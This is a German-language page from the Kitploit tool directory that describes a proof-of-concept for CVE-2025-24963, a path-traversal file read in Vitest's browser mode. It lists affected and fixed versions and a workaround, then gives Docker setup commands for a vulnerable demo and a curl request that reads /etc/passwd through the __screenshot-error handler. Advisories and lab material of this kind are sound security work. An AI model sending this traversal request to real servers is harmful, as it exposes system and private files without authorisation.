Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24963 — Proof-of-Concept-Exploit für CVE-2025-24963, eine lokale Dateileseschwachstelle im Vitest-Browsermodus über den __screenshot-error-Handler, die die Offenlegung beliebiger Dateien auf exponierten Servern ermöglicht. | Kitploit
Tools/GitHubGitHub/hiteshpatra/cve-2025-24963
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubhiteshpatra/cve-2025-24963

CVE-2025-24963

Proof-of-Concept-Exploit für CVE-2025-24963, eine lokale Dateileseschwachstelle im Vitest-Browsermodus über den __screenshot-error-Handler, die die Offenlegung beliebiger Dateien auf exponierten Servern ermöglicht.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24963 - Vitest Browser-Modus - Lokales Dateilesen

CVE-2025-24963 ist eine Schwachstelle mittlerer Schwere (CVSS 3.1-Score: 5.9), die das Paket @vitest/browser betrifft, eine Komponente des auf Vite basierenden Vitest-Testframeworks. Diese Schwachstelle entsteht durch eine unzureichende Eingabevalidierung im __screenshot-error-Handler des HTTP-Servers des Browser-Modus. Wenn der Server über die Konfigurationsoption browser.api.host: true im Netzwerk freigegeben wird, kann ein Angreifer speziell gestaltete Anfragen senden, um auf beliebige Dateien im Dateisystem des Servers zuzugreifen, was möglicherweise zu einer unbefugten Offenlegung vertraulicher Informationen führt.

Betroffene Versionen

Die Schwachstelle betrifft die folgenden Versionen von @vitest/browser:

  • 2.0.4 bis 2.1.8
  • 3.0.0 bis 3.0.3

Gegenmaßnahmen

Dieses Problem wurde in den Versionen 2.1.9 und 3.0.4 behoben. Benutzer werden dringend aufgefordert, auf diese oder neuere Versionen zu aktualisieren, um die Schwachstelle zu entschärfen.

Problemumgehung

Wenn eine sofortige Aktualisierung nicht möglich ist, besteht eine temporäre Problemumgehung darin, den Server des Browser-Modus nicht im Netzwerk freizugeben, indem du browser.api.host: true nicht in deiner Konfiguration festlegst. Dadurch wird der externe Zugriff auf den anfälligen Handler verhindert.

Umgebung vorbereiten

root@kitploit:~
git clone https://github.com/0xdeviner/CVE-2025-24963.git
cd CVE-2025-24963/vitest-vuln-demo
docker build -t vitest-cve-2025-24963 .
docker run -itd --name vitest-cve -p 63315:63315 vitest-cve-2025-24963

Hinweis: Der von Vitest verwendete Port ist dynamisch (z. B. 63315). Du solltest die Protokolle überwachen und dein -p-Flag entsprechend anpassen.

Exploit

root@kitploit:~
curl "http://<IP>:63315/__screenshot-error?file=../../../../../../etc/passwd"
Tool herunterladen